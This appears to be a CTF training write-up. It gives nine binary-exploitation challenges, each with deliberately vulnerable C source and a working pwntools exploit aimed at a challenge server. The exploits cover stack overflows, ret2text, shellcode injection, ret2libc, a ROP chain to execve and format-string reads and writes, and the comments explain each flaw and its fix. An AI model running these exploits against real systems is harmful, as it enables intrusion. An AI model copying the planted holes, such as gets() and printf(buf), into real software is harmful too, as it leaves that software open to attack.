0x01-pwntools
from pwn import *
# Warm-up: the service announces an upper bound ("... N!") and answers each
# guess with "Higher!" / "Lower!" until the number is found, so a binary
# search over [0, N] converges in O(log N) round trips.
conn = remote('140.110.112.217', 10000)
banner = conn.recvline().decode('UTF-8').strip()
print(banner)
# The bound is the last whitespace-separated token, minus its trailing '!'.
upper_bound = int(banner.split()[-1].rstrip('!'))
print(upper_bound)

lo, hi = 0, upper_bound
while True:
    mid = (lo + hi) // 2
    conn.sendline(str(mid).encode('UTF-8'))
    verdict = conn.recvline().decode().strip()
    if verdict == 'Higher!':
        lo = mid + 1
        continue
    if verdict == 'Lower!':
        hi = mid - 1
        continue
    # Anything else is the final answer (or an unexpected reply) — show it
    # and hand the session over to the user.
    print(verdict)
    break

conn.interactive()
conn.close()
0x02-bof_var
source code:
#include <stdio.h>
//gcc -o bof_var bof_var.c -fno-stack-protector
int main() {
    setvbuf(stdout, NULL, _IONBF, 0);   /* _IONBF: unbuffered stdout, so the prompt is flushed before read() blocks */
    int key = 1234;
    puts("Please enter your name:");
    char name[16];
    /* VULN: up to 100 bytes are read into a 16-byte stack buffer, so input
     * can overwrite neighbouring stack data such as `key`. The build flag
     * -fno-stack-protector removes the canary that would otherwise abort
     * before main() returns. Fix: read(0, name, sizeof name).
     * read() is declared in <unistd.h>, which this file does not include
     * (only <stdio.h>), so the call relies on an implicit declaration. */
    read(0, name, 100);
    /* `key` is never assigned after its initializer, so this branch is
     * reachable only through memory corruption. */
    if(key == 0xfaceb00c){
        puts("FLAG{FAKE_FLAG}");
    }
    return 0;
}
exploit:
from pwn import *
# Connect to the bof_var service (port 10001 on the challenge host).
r = remote('140.110.112.217', 10001)
# 28 bytes of padding followed by the value main() compares `key` against.
# The 28-byte distance between `name` and `key` is a property of the
# author's compiled binary, not derivable from the C source — confirm
# against the actual layout if the binary is rebuilt. p64() emits 8 bytes
# while `key` is a 4-byte int, so the upper half lands past `key`.
r.sendline(b'A' * 28 + p64(0xfaceb00c))
print(r.recvline())   # first line returned by the service
r.interactive()
r.close()
0x03-ret2text
source code:
#include <stdio.h>
//gcc -o ret2text ret2text.c -fno-stack-protector -no-pie
/* Spawns a shell. Nothing in this file calls it, so it is reachable only by
 * redirecting control flow (e.g. a corrupted return address). system() is
 * declared in <stdlib.h>, which this file does not include. */
void backdoor(){
    system("/bin/sh");
}
int main() {
    char buffer[8];
    /* VULN: gets() has no length limit (it was removed from the language in
     * C11), so input overflows the 8-byte buffer into the saved frame
     * pointer and return address. -no-pie keeps backdoor() at a fixed
     * address and -fno-stack-protector disables the canary.
     * Fix: fgets(buffer, sizeof buffer, stdin); build with PIE and the
     * stack protector enabled. */
    gets(buffer);
    return 0;
}
exploit:
from pwn import *
# Connect to the ret2text service (port 10002).
r = remote('140.110.112.217', 10002)
# 16 bytes cover the 8-byte buffer plus the saved rbp (layout inferred from
# the source), then the return address is replaced with 0x40115b —
# presumably the address of backdoor() in the non-PIE binary. The address
# is specific to the author's build.
r.sendline(b'A' * 16 + p64(0x40115b))
r.interactive()
r.close()
0x04-ret2sc
source code:
#include <stdio.h>
#include <sys/mman.h>
// gcc -o ret2sc ret2sc.c -fno-stack-protector -no-pie -z execstack
/* Global input buffer; with -no-pie it lives at a fixed address. */
char message[50];
int main() {
    setvbuf(stdout,0,2,0);   /* mode 2 is _IONBF on glibc: unbuffered stdout — confirm for other libcs */
    /* Remaps the page 0x404000-0x405000 read/write/execute. Under -no-pie
     * this is a fixed range, and the exploit below treats it as the page
     * holding `message`. Granting PROT_EXEC to writable data (and building
     * with -z execstack) defeats NX: anything written here can be run.
     * Fix: never mprotect data pages executable; drop -z execstack. */
    void *mem = (void *)0x00404000;
    size_t size = 0x00405000 - 0x00404000;
    mprotect(mem, size, PROT_READ | PROT_WRITE | PROT_EXEC);
    puts("Say something to me?:");
    /* Bounded to the 50-byte global, so not an overflow by itself — but it
     * lets the client place arbitrary bytes into the executable page.
     * read() needs <unistd.h>, which is not included here. */
    read(0, message, 50);
    puts("Show me ret2sc!");
    char buffer[100];
    /* VULN: unbounded gets() into a 100-byte stack buffer overwrites the
     * return address (no canary: -fno-stack-protector).
     * Fix: fgets(buffer, sizeof buffer, stdin). */
    gets(buffer);
    return 0;
}
exploit:
from pwn import *
# Connect to the ret2sc service (port 10003).
r = remote('140.110.112.217', 10003)
# Machine code that the first send() stores in the global `message`, which
# main() has made executable via mprotect().
shellcode = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
r.recvline()            # "Say something to me?:"
r.sendline(shellcode)   # consumed by read(0, message, 50)
r.recvline()            # "Show me ret2sc!"
# Overflow the 100-byte buffer read by gets(): 136 bytes of padding reach
# the saved return address (distance inferred from the author's build),
# which is replaced by 0x404080 — presumably &message inside the RWX page.
# NX (no PROT_EXEC on data, no -z execstack) would make the jump fault.
r.sendline(b'a'*136 + p64(0x404080))
r.interactive()
r.close()
0x05-ret2libc
source code:
#include <stdio.h>
// gcc -o ret2libc ret2libc.c -fno-stack-protector
int main(){
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char address[10];      /* declared but never used */
    char message[16];
    unsigned int addr ;    /* declared but never used */
    puts("Can you return to library?");
    /* INFO LEAK: printing the address of puts() reveals where libc is
     * mapped, and printing `message` reveals the stack position — both
     * defeat ASLR for the regions an attacker needs. Fix: never emit raw
     * pointers to the client. */
    printf("Address of puts: %p\n", puts);
    printf("Address of message: %p\n", message);
    printf("Say some thing :\n");
    /* VULN: unbounded gets() into a 16-byte stack buffer; with
     * -fno-stack-protector nothing detects the overwritten return address.
     * Fix: fgets(message, sizeof message, stdin). */
    gets(message);
    puts("Thanks you ~");
    return 0 ;
}
exploit:
from pwn import *
#r=process("./ret2libc")
# Connect to the ret2libc service (port 10004).
r = remote('140.110.112.217', 10004)
r.recvline()   # "Can you return to library?"
# The service prints "Address of puts: 0x..." and "Address of message:
# 0x..."; the 4th space-separated field is the hex address (int(..., 16)
# accepts the 0x prefix and the trailing newline).
puts=int(r.recvline().decode().split(' ')[3],16)
mes=int(r.recvline().decode().split(' ')[3],16)
r.recvline()   # "Say some thing :"
# Offsets of puts() and system() inside the remote host's libc.
# NOTE(review): these are build-specific constants; the libc version they
# belong to is not recorded on this page.
puts_offset= 0x80e50
sys_offset=0xebc81
libc_base=puts-puts_offset   # the leaked puts address defeats libc ASLR
system=libc_base+sys_offset
# Fake saved rbp placed below the leaked stack address — presumably so
# that frame-pointer-relative accesses after the return stay in mapped
# stack memory.
rbp=mes-0x2000
#gdb.attach(r)
# 32 bytes of padding (16-byte `message` plus the gap to the saved rbp —
# inferred from the author's build), then the fake rbp and a return into
# system(). Mitigations: do not print pointers (the leak is what makes
# these addresses computable) and replace gets() with a bounded read.
r.sendline(b'a'*32+ p64(rbp)+p64(system))
r.interactive()
r.close()
0x06-rop
source code:
#include <stdio.h>
// gcc -o rop rop.c -static -no-pie -fno-stack-protector
/* Global buffer; fixed address under -no-pie. */
char message[16];
int main()
{
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char buf[8];
    puts("Leave some message:");
    /* Bounded to 16 bytes, so not an overflow — but it stores
     * attacker-chosen bytes at a known address. read() needs <unistd.h>. */
    read(0, message, 16);
    puts("Show me rop!");
    /* VULN: unbounded gets() into an 8-byte stack buffer overwrites the
     * return address. -static links libc's code into the executable, so
     * together with -no-pie it offers a large pool of gadgets at fixed
     * addresses. Fix: fgets(buf, sizeof buf, stdin); build with PIE and
     * the stack protector. */
    gets(buf);
    return 0;
}
exploit:
from pwn import *
#r=process("./rop")
# Connect to the rop service (port 10005).
r = remote('140.110.112.217', 10005)
r.recvline()                  # "Leave some message:"
# Stored in the 16-byte global `message` by read(); it becomes the path
# argument of the execve() call built below.
r.sendline('/bin/sh\x00')
r.recvline()                  # "Show me rop!"
# Gadget addresses inside the statically linked, non-PIE binary; they are
# specific to the author's build.
pop_rdi=0x401f2f
pop_rsi=0x409f9e
pop_rax_rdx_rbx=0x47f2ea
pop_rax=0x419484              # defined but not used in the chain below
syscall=0x401ce4
# ROP chain after 16 bytes of padding (8-byte buf + saved rbp, inferred):
# rdi = 0x4c72f0 (presumably &message, i.e. the "/bin/sh" string),
# rsi = 0, rax = 59 (execve on x86-64), rdx = 0, rbx = 59 (filler for
# the three-register pop), then the syscall gadget.
# Mitigations: stack canary, PIE, and a bounded read in place of gets().
r.sendline(b'a'*16+p64(pop_rdi)+p64(0x4c72f0)+p64(pop_rsi)+p64(0)+p64(pop_rax_rdx_rbx)+p64(59)+p64(0)+p64(59)+p64(syscall))
r.interactive()
r.close()
0x07-fmt1
source code:
#include <stdio.h>
// gcc -o fmt_1 fmt_1.c
int main()
{
    char buf[40];
    /* The 16-character literal exactly fills the array, so `flag` has no
     * NUL terminator (legal in C, but it is not a C string). */
    char flag[16] = "FLAG{FAKE_FLAG!}";
    /* VULN: "%s" has no width limit; fix with "%39s". */
    scanf("%s", buf);
    /* VULN: user input used as the format string lets the caller read
     * stack contents with "%N$p" (here, the adjacent `flag` array).
     * Fix: printf("%s", buf) or puts(buf); compile with -Wformat-security. */
    printf(buf);
    return 0;
}
exploit:
parrot@G:/mnt/d/Users/cheng/Downloads$ nc 140.110.112.217 10006
%6$p,%7$p
0x7730687b47414c46,0x7d63755f6e34635f
parrot@G:/mnt/d/Users/cheng/Downloads$ python3
Type "help", "copyright", "credits" or "license" for more information.
>>> a="w0h{GALF"
>>> print(a[::-1])
FLAG{h0w
>>> b="}cu_n4c_"
>>> print(b[::-1])
_c4n_uc}
>>>
0x08-fmt2
source code:
#include <stdio.h>
// gcc -o fmt_2 fmt_2.c
/* 16-character literal exactly fills the array: no NUL terminator. */
char flag[16] = "FLAG{FAKE_FLAG!}";
int main()
{
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    /* INFO LEAK: reveals the data-segment address, defeating PIE/ASLR for
     * the global. Fix: never print raw pointers. */
    printf("Address of flag: %p\n", flag);
    char buf[40];
    scanf("%s", buf);   /* VULN: unbounded; fix with "%39s" */
    /* VULN: input-controlled format string — "%N$s" dereferences an
     * attacker-supplied pointer placed in buf. Fix: printf("%s", buf). */
    printf(buf);
    return 0;
}
exploit:
from pwn import *
#r=process("./fmt_2")
# Connect to the fmt_2 service (port 10007).
r = remote('140.110.112.217', 10007)
# Parse "Address of flag: 0x...\n". NOTE(review): str.strip('0x') removes
# any run of '0'/'x' characters from both ends of the token, not just the
# "0x" prefix; it works here only because the trailing '\n' is still
# attached and shields trailing zero digits.
flag=int(r.recvline().decode().split(' ')[3].strip('0x'),16)
# "%7$s" prints the string at the pointer held in the 7th vararg slot; the
# 4 filler bytes make the prefix 8 bytes so the appended pointer is
# 8-byte aligned within buf. That slot 7 maps onto buf is a property of
# the author's binary, not visible in the source.
s= b'%7$s' + b'd'*4 + p64(flag)
print(flag)
#gdb.attach(r)
r.sendline(s)
r.interactive()
r.close()
0x09-fmt3
source code:
#include <stdio.h>
// gcc -o fmt_3 fmt_3.c
/* Global guard byte; main() only reads it, so a change to 'b' can come
 * solely from memory corruption. */
char key = 'a';
int main()
{
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    /* INFO LEAK: reveals the data-segment address, defeating PIE/ASLR. */
    printf("Address of key: %p\n", &key);
    char buf[40];
    scanf("%s", buf);   /* VULN: unbounded; fix with "%39s" */
    /* VULN: input-controlled format string. "%n" writes the number of
     * characters printed so far to an attacker-supplied pointer, which is
     * how `key` gets changed. Fix: printf("%s", buf); building with
     * -D_FORTIFY_SOURCE=2 also rejects %n in writable format strings.
     * system() needs <stdlib.h>, not included here. */
    printf(buf);
    if(key == 'b') system("/bin/sh");
    return 0;
}
exploit:
from pwn import *
#r=process("./fmt_3")
# Connect to the fmt_3 service (port 10008).
r = remote('140.110.112.217', 10008)
# Parse "Address of key: 0x...\n". NOTE(review): as with str.strip('0x')
# elsewhere, this strips any '0'/'x' characters at both ends of the token;
# the trailing '\n' is what keeps trailing zero digits intact here.
key=int(r.recvline().decode().split(' ')[3].strip('0x'),16)
# "%98c" prints 98 characters, then "%7$n" stores that count (98 == 'b')
# through the pointer in the 7th vararg slot — the appended address of
# `key`. The 8-byte prefix keeps the pointer 8-byte aligned in buf; the
# slot number is specific to the author's binary.
s= b'%98c%7$n' + p64(key)
print(key)
#gdb.attach(r)
r.sendline(s)
r.interactive()
r.close()